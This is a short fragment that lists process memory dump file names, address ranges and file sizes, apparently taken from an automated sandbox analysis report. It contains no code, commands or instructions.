memory/4612-149-0x0000000000000000-mapping.dmp
-
memory/4612-331-0x0000000060900000-0x0000000060992000-memory.dmpFilesize
584KB
-
memory/4612-351-0x0000000002C0D000-0x0000000002C3A000-memory.dmpFilesize
180KB
-
memory/4612-352-0x0000000002DE0000-0x0000000002E2E000-memory.dmpFilesize
312KB
-
memory/4612-353-0x0000000000400000-0x0000000002B80000-memory.dmpFilesize
39.5MB
-
memory/4636-292-0x0000000000000000-mapping.dmp
-
memory/4828-319-0x0000000000000000-mapping.dmp
-
memory/4936-189-0x0000000000020000-0x00000000008E1000-memory.dmpFilesize
8.8MB
-
memory/4936-186-0x0000000000020000-0x00000000008E1000-memory.dmpFilesize
8.8MB
-
memory/4936-141-0x0000000000000000-mapping.dmp
-
memory/5000-138-0x0000000000000000-mapping.dmp